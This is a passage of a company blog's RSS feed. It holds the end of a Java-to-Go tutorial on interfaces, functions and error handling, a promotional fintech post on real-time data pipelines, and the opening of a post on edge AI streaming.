    r &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;FileReader&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Read&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If you want to be sure that a struct implements an interface, you can add the following line:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; r Reader &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;FileReader&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A good practice is to define the interface where it’s used, and not where it’s implemented.&lt;/p&gt;
&lt;p&gt;This unlocks some useful things. One is that you can always declare an interface, and make sure your code’s intention is clear: it needs the &lt;code class=&quot;language-text&quot;&gt;Read&lt;/code&gt; method, not &lt;code class=&quot;language-text&quot;&gt;FileReader&lt;/code&gt; itself.&lt;/p&gt;
&lt;p&gt;Another benefit is visible in tests: since you can always define an interface yourself, you can also easily create mocks or write stubs for it and write better tests.&lt;/p&gt;
&lt;h1&gt;Functions&lt;/h1&gt;
&lt;p&gt;Functions in Go are generally what methods are in Java. Go has methods too, and those are functions defined on types, i.e. functions that have a receiver. It’s &lt;em&gt;very close&lt;/em&gt; to object methods in Java, but there’s a difference. that we’ll explain in a later blog post. Here are the most important differences between Go functions and Java methods.&lt;/p&gt;
&lt;h2&gt;No overloading&lt;/h2&gt;
&lt;p&gt;In Go, no two functions in the same package can have the same name, regardless of the number of parameters or their types. At first, it might be a thing, but over time you get used to it, and just “work around it”, either by using generics, or by thinking if that’s really needed and if it actually needs to be simplified.&lt;/p&gt;
&lt;h2&gt;Multiple return values&lt;/h2&gt;
&lt;p&gt;A function can return values. You might be thinking: “No way, that’s horrible!” You have my full understanding, that was my reaction too. It immediately reminded me of the &lt;code class=&quot;language-text&quot;&gt;out&lt;/code&gt; parameter in C#, yuck. However, it makes it possible to write simpler code for use cases that need to return 2 values, like splitting a string into a key and value, or getting the host and path from a URL, and so on. But, when you need to return 3, 4, or more variables, then it’s likely a code smell and usually it can be simplified.&lt;/p&gt;
&lt;p&gt;Most often though, you’ll see a function return 2 values at most, and when that happens that’s usually a “real” return value and an error, like here:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// Sqrt return the square root of the input parameter.&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// It returns an error if the parameter is negative.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Sqrt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;x &lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We’ll explain the &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; next.&lt;/p&gt;
&lt;h1&gt;Error handling&lt;/h1&gt;
&lt;p&gt;Go code signals error by returning &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; values. &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; is a special built-in interface:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// The error built-in interface type is the conventional interface for&lt;/span&gt;
&lt;span class=&quot;token comment&quot;&gt;// representing an error condition, with the nil value representing no error.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A nil &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; denotes success; a non-nil &lt;code class=&quot;language-text&quot;&gt;error&lt;/code&gt; denotes failure. In a way, it’s the Go version of Java’s &lt;code class=&quot;language-text&quot;&gt;Exception&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In Go, you can construct your own error types (like in &lt;a href=&quot;https://go.dev/tour/methods/19&quot;&gt;this example&lt;/a&gt; from the Tour of Go). But (and that’s another difference in thinking), most of the time you work with error values: you create new error values and check for error values. In Java code it’s not uncommon to see new exception classes being written, and&lt;code class=&quot;language-text&quot;&gt;try-catch&lt;/code&gt; blocks normally check for exception classes too.&lt;/p&gt;
&lt;p&gt;Here’s some typical Go code that returns a new error value:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; x &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cannot use negative number&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Or, you create an errors from existing errors, indicating the cause:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// ErrAlreadyRunning is an error variable.&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; ErrAlreadyRunning &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pipeline already running&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;runPipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;isRunning&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;id&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
       &lt;span class=&quot;token comment&quot;&gt;// we return a new error indicating that it was caused by ErrAlreadyRunning&lt;/span&gt;
       &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Errorf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;couldn&apos;t run pipeline: %w&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ErrAlreadyRunning&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token comment&quot;&gt;// rest of code&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It’s similar to creating a new exception in Java with another exception as a cause and a custom message. If our error handling needs to check whether an error has a certain cause, we again check for the value, for example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;runPipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;abc123&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Is&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; ErrAlreadyRunning&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Pipeline is already running&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1&gt;Wrapping Up&lt;/h1&gt;
&lt;p&gt;Transitioning from Java to Go is a journey of unlearning, relearning, and embracing simplicity. While at first, some concepts in Go—like multiple return values or implicit interfaces—may feel unconventional, over time they reveal their elegance and strength.&lt;/p&gt;
&lt;p&gt;If you’re considering learning Go or making the switch, remember: it’s less about mastering a new syntax and more about adapting to a different way of thinking. And once you do, it’s a pretty rewarding shift. 🚀&lt;/p&gt;
&lt;p&gt;I hope this post gave you a helpful starting point and some clarity on the key differences between Java and Go. In the following posts, I&apos;ll cover more topics like the ecosystems, packages (you’ll be surprised about this), structs, types of receivers, and more.&lt;/p&gt;
&lt;p&gt;Want to stay in the loop? Join our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt;, follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, or subscribe to our &lt;a href=&quot;https://meroxa.com/blog/rss.xml&quot;&gt;RSS feed&lt;/a&gt; for future posts!&lt;/p&gt;
&lt;p&gt;Thanks for reading, and happy coding! 🧑‍💻✨&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How Real-Time Data Pipelines Drive Financial Insights in Fintech]]></title><description><![CDATA[This blog explores how real-time data pipelines can cut fraud losses by 60%, reduce compliance costs by 50%, and drive multi-million dollar savings. Learn how fintech CTOs can leverage modern data architectures for sub-millisecond transaction processing, AI-driven risk management, and scalable infrastructure to future-proof their financial operations. ]]></description><link>https://meroxa.com/blog/how-real-time-data-pipelines-drive-financial-insights-in-fintech</link><guid isPermaLink="false">https://meroxa.com/blog/how-real-time-data-pipelines-drive-financial-insights-in-fintech</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Tue, 18 Feb 2025 11:54:00 GMT</pubDate><content:encoded>&lt;h2&gt;&lt;strong&gt;Executive Summary&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;In the &lt;strong&gt;fintech industry&lt;/strong&gt;, real-time data processing is critical for &lt;strong&gt;fraud detection, compliance monitoring, high-frequency trading, and AI-driven customer insights&lt;/strong&gt;. Traditional batch-based financial data pipelines introduce unacceptable delays, leading to &lt;strong&gt;financial losses, regulatory fines, and poor user experiences&lt;/strong&gt;.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Key Industry Insights:&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/industry-insights.png&quot; alt=&quot;industry-insights.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;By implementing &lt;strong&gt;real-time data pipelines&lt;/strong&gt;, fintech companies can:&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Prevent fraud before it happens&lt;/strong&gt;
✅ &lt;strong&gt;Deliver AI-powered financial insights instantly&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Optimize trading and payment processing with sub-millisecond latency&lt;/strong&gt;
✅ &lt;strong&gt;Ensure regulatory compliance effortlessly&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cut Fraud Losses by 60%—Deploy Real-Time Pipelines &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Today&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Why Real-Time Data is Critical for Fintech Success&lt;/strong&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;strong&gt;Challenges of Legacy Financial Data Processing&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/financial-data-processing.png&quot; alt=&quot;financial-data-processing.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Reduce Compliance Costs with Instant AML &amp;#x26; SOX Reporting—&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Schedule a Demo.&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Real-Time Pipeline Architecture for Fintech&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s &lt;strong&gt;Real-Time Pipeline Architecture&lt;/strong&gt;, leveraging &lt;strong&gt;Databricks&lt;/strong&gt;, enables fintech companies to process financial transactions instantly. The architecture ingests data from &lt;strong&gt;Point-of-Sale (POS) systems and payment gateways&lt;/strong&gt;, streaming it into &lt;strong&gt;Meroxa&lt;/strong&gt; for real-time enrichment and anomaly detection. The processed data is then stored in &lt;strong&gt;Databricks Delta Lake&lt;/strong&gt;, where AI models analyze transaction patterns, detect fraud, and generate risk scores. Automated fraud prevention and compliance workflows trigger &lt;strong&gt;instant alerts and actions&lt;/strong&gt;, notifying &lt;strong&gt;customers, bank administrators, and regulatory teams&lt;/strong&gt;.
&lt;img src=&quot;https://meroxa.com/img/finance.png&quot; alt=&quot;financial.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Example flow using Databricks&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Key Technologies in Modern Fintech Data Pipelines&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Modern fintech data pipelines rely on a &lt;strong&gt;high-performance technology stack&lt;/strong&gt; to ensure &lt;strong&gt;real-time data ingestion, processing, storage, AI-driven analytics, and compliance monitoring&lt;/strong&gt;. &lt;strong&gt;Ingestion layers&lt;/strong&gt; like Kafka, Pulsar, and Meroxa Conduit capture financial transactions and user activity instantly. &lt;strong&gt;Stream processing engines&lt;/strong&gt; such as Apache Flink and Spark Streaming enable &lt;strong&gt;fraud detection, anomaly detection, and risk scoring in milliseconds&lt;/strong&gt;. High-speed &lt;strong&gt;databases&lt;/strong&gt; like ClickHouse, Snowflake, and PostgreSQL provide &lt;strong&gt;sub-second querying for compliance and analytics&lt;/strong&gt;, while AI frameworks like TensorFlow and PyTorch power &lt;strong&gt;predictive fraud prevention and credit scoring models&lt;/strong&gt;. &lt;strong&gt;Visualization tools&lt;/strong&gt; like Grafana and Looker deliver &lt;strong&gt;real-time alerts and trading insights&lt;/strong&gt;, ensuring fintech companies stay ahead in an increasingly data-driven industry.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/fintech-data-pipelines.png&quot; alt=&quot;financial data processing.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Eliminate Latency in Fraud Detection—&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Talk to an Expert Today.&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Cost Breakdown: Meroxa&apos;s Conduit Platform vs Competitors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When evaluating real-time data pipeline solutions, &lt;strong&gt;cost efficiency is critical&lt;/strong&gt; for fintech companies. &lt;strong&gt;Conduit Platform&lt;/strong&gt; offers a &lt;strong&gt;40% lower infrastructure cost&lt;/strong&gt; due to its auto-scaling capabilities, eliminating the need for expensive batch processing. Unlike competitors that require &lt;strong&gt;manual DevOps management&lt;/strong&gt; and complex tuning, Meroxa provides a &lt;strong&gt;fully managed, low-latency solution&lt;/strong&gt; with minimal operational overhead.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/meroxa-conduit-vs-competitors.png&quot; alt=&quot;meroxa-conduit-vs-competitors.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Optimize Your Fintech Data Stack&lt;/a&gt;—Cut Infrastructure &amp;#x26; Compliance Costs by 50% with Conduit Platform.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Cost Projections for Different Fintech Segments&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Fintech companies across various segments stand to gain &lt;strong&gt;significant cost savings and ROI&lt;/strong&gt; by implementing &lt;strong&gt;real-time data pipelines&lt;/strong&gt;. Digital banking and payments firms can &lt;strong&gt;reduce fraud-related chargebacks by 60%&lt;/strong&gt;, saving over &lt;strong&gt;$20M annually&lt;/strong&gt;, while high-frequency trading platforms can optimize execution speeds to &lt;strong&gt;cut slippage costs&lt;/strong&gt; by &lt;strong&gt;$15M+ per year&lt;/strong&gt;. Lending and credit scoring businesses can lower default rates, leading to &lt;strong&gt;$10M in savings&lt;/strong&gt;, and compliance automation can reduce regulatory fines, saving &lt;strong&gt;$8M annually&lt;/strong&gt;. Fraud prevention and risk management solutions see the &lt;strong&gt;biggest impact&lt;/strong&gt;, with potential savings of &lt;strong&gt;$30M+ annually&lt;/strong&gt; by detecting fraudulent transactions in under &lt;strong&gt;500ms&lt;/strong&gt;. Across all segments, real-time pipelines deliver &lt;strong&gt;high ROI, lower costs, and greater efficiency&lt;/strong&gt;, making them essential for fintech success.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Projected Cost Savings &amp;#x26; ROI by Fintech Segment&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/cost-saving-roi.png&quot; alt=&quot;cost-saving-roi.png&quot;&gt; &lt;em&gt;&lt;strong&gt;All savings are estimations.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Performance Benchmark: Meroxa&apos;s Conduit Platform vs Competitors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;When it comes to &lt;strong&gt;real-time data performance in fintech&lt;/strong&gt;, &lt;strong&gt;Meroxa&apos;s Conduit Platform&lt;/strong&gt; outpaces competitors with &lt;strong&gt;sub-500ms AI-powered fraud detection, sub-second transaction latency, and auto-scaling to handle over 1M TPS (transactions per second).&lt;/strong&gt; Unlike traditional batch-based solutions that introduce delays, Meroxa ensures &lt;strong&gt;instant compliance reporting, seamless fraud prevention, and optimized trading execution.&lt;/strong&gt; Compared to alternatives like &lt;strong&gt;Fivetran, Kafka Streams, and Confluent Cloud&lt;/strong&gt;, Meroxa delivers &lt;strong&gt;lower costs, minimal DevOps overhead, and built-in AI/ML integrations&lt;/strong&gt; for &lt;strong&gt;unmatched efficiency and scalability&lt;/strong&gt; in financial data processing.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/performance-benchmark.png&quot; alt=&quot;performance-benchmark.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Achieve Sub-500ms Fraud Detection &amp;#x26; Real-Time Compliance!&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion &amp;#x26; Next Steps&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Conduit Platform provides a &lt;strong&gt;scalable, low-latency, AI-powered solution&lt;/strong&gt; designed specifically for &lt;strong&gt;fraud prevention, high-frequency trading, credit risk assessment, and compliance automation&lt;/strong&gt;. With &lt;strong&gt;sub-second transaction processing, auto-scaling capabilities, and built-in compliance features&lt;/strong&gt;, our platform enables fintech CTOs to &lt;strong&gt;future-proof their infrastructure, unlock cost savings, and drive long-term business growth&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;👉 &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Request a Demo&lt;/a&gt; | Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unlocking the Power of Edge AI with Real-Time Streaming: From Sensors to Insights Using Meroxa]]></title><description><![CDATA[This blog explores how low-latency inference, hardware acceleration, and agile real-time data pipelines drive faster, smarter decision-making. Learn how Meroxa empowers organizations with seamless data ingestion, real-time analytics, and scalable infrastructure to bridge the gap between edge computing and actionable insights—unlocking the full potential of AI-driven innovation.]]></description><link>https://meroxa.com/blog/unlocking-the-power-of-edge-ai-with-real-time-streaming-from-sensors-to-insights-using-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/unlocking-the-power-of-edge-ai-with-real-time-streaming-from-sensors-to-insights-using-meroxa</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 11 Feb 2025 22:33:00 GMT</pubDate><content:encoded>&lt;p&gt;In today’s fast-paced digital world, the ability to process and analyze data right at its source is more than just an operational advantage—it’s a strategic imperative. As industries evolve and data volumes surge, the need for real-time insights has never been greater. This blog post explores how edge and on-device AI are transforming industries, and how Meroxa is at the forefront of this revolution by enabling seamless, low-latency data capture and processing.&lt;/p&gt;
&lt;h3&gt;Low-Latency Inference: The Heart of Real-Time Decision-Making&lt;/h3&gt;
&lt;h4&gt;Why Low-Latency Matters&lt;/h4&gt;
&lt;p&gt;At its core, low-latency inference is about reducing the delay between data generation and actionable insights. Traditional cloud-based architectures often involve sending data over long distances for processing—a delay that, in mission-critical applications, can mean the difference between success and failure. By moving the inference process closer to where the data is created, edge AI dramatically cuts down these delays, ensuring faster and more reliable decision-making.&lt;/p&gt;
&lt;h4&gt;Real-World Applications&lt;/h4&gt;
&lt;p&gt;Imagine a self-driving car navigating a busy city. Every millisecond counts as the vehicle processes sensor data to detect obstacles and plan safe routes. By performing inference on-device, the car can react instantly, bypassing the latency introduced by cloud communication. Similarly, industrial IoT applications—such as predictive maintenance on factory equipment—rely on real-time analysis to prevent costly downtime. For instance, a drone engaged in infrastructure inspection can instantly process visual data to identify structural anomalies, ensuring timely maintenance interventions. In these scenarios, on-device AI not only improves safety and operational efficiency but also minimizes the dependence on constant cloud connectivity. Systems can operate more efficiently, safeguarding both assets and human lives.&lt;/p&gt;
&lt;h3&gt;Hardware Acceleration: Powering the Edge&lt;/h3&gt;
&lt;h4&gt;The Rise of Specialized Processors&lt;/h4&gt;
&lt;p&gt;The push for real-time performance has led to the integration of specialized hardware accelerators in edge devices. GPUs, TPUs, and FPGAs are increasingly common in applications where rapid data processing is essential. These processors are designed to handle the intensive computations required by modern AI algorithms, delivering high performance without compromising on energy efficiency.&lt;/p&gt;
&lt;h4&gt;Real-World Applications in Critical Industries&lt;/h4&gt;
&lt;p&gt;In healthcare, portable diagnostic devices and patient monitoring systems are being enhanced with on-device AI capabilities. Accelerators in these devices process medical images or sensor data in real time, facilitating faster diagnoses and immediate care decisions without compromising patient data privacy. Similarly, manufacturing robotics benefit from hardware acceleration by achieving precise, real-time control that ensures both productivity and safety on the factory floor.&lt;/p&gt;
&lt;p&gt;These specialized accelerators not only enhance processing speed but also reduce energy consumption—a crucial factor in edge environments where power efficiency is paramount. By offloading computationally intensive tasks to dedicated hardware, edge devices can maintain high performance while operating within the physical constraints of their deployment scenarios.&lt;/p&gt;
&lt;h3&gt;Real-Time Data Pipelines: The Backbone of Edge AI&lt;/h3&gt;
&lt;h4&gt;Enabling Continuous, Actionable Insights&lt;/h4&gt;
&lt;p&gt;For edge AI to deliver its promise of instantaneous insights, a robust and agile data pipeline is essential. Real-time data pipelines capture, ingest, process, and route data as it’s generated, allowing on-device AI models to analyze it almost immediately. This end-to-end approach minimizes delay and maximizes the impact of every data point collected.&lt;/p&gt;
&lt;h4&gt;How Meroxa Drives Real-Time Data Pipelines at the Edge&lt;/h4&gt;
&lt;p&gt;Meroxa’s platform is designed to excel in this environment. By providing a unified framework for real-time data capture and processing, Meroxa enables organizations to bridge the gap between edge devices and actionable insights. Here’s how Meroxa’s approach drives success:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Seamless Data Ingestion:&lt;/strong&gt; Meroxa efficiently captures data from diverse edge sources, ensuring that no critical piece of information is lost. Whether it’s sensor readings from industrial equipment or real-time telemetry from autonomous vehicles, the platform ingests data with minimal latency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Streamlined Processing:&lt;/strong&gt; Once data is ingested, Meroxa’s real-time pipelines process and transform it on the fly. This enables AI models to perform inference immediately, ensuring that insights are generated and acted upon in near real time.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Integration:&lt;/strong&gt; Meroxa’s architecture is built to scale, accommodating the growing volume and variety of data generated at the edge. This scalability is essential for large enterprises that operate across multiple geographies and require a reliable, unified data infrastructure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced Collaboration:&lt;/strong&gt; By integrating seamlessly with on-device intelligence, Meroxa not only accelerates data processing but also facilitates a collaborative ecosystem where edge and cloud systems work in tandem. This synergy ensures that organizations can leverage the best of both worlds—immediate, on-device insights and the broader analytical capabilities of cloud-based systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Real-World Use Cases: Data Acquisition in Action&lt;/h3&gt;
&lt;p&gt;Visualizing the data acquisition flow can clarify how Meroxa’s platform integrates with edge and on-device AI to deliver real-time insights. Consider these two real-world examples:&lt;/p&gt;
&lt;h3&gt;Healthcare Clinical Trials&lt;/h3&gt;
&lt;p&gt;In the context of clinical trials, a multitude of patient-generated data—ranging from wearable sensor metrics to diagnostic imaging—is collected and processed. The following diagram illustrates a typical data flow using Meroxa:&lt;/p&gt;
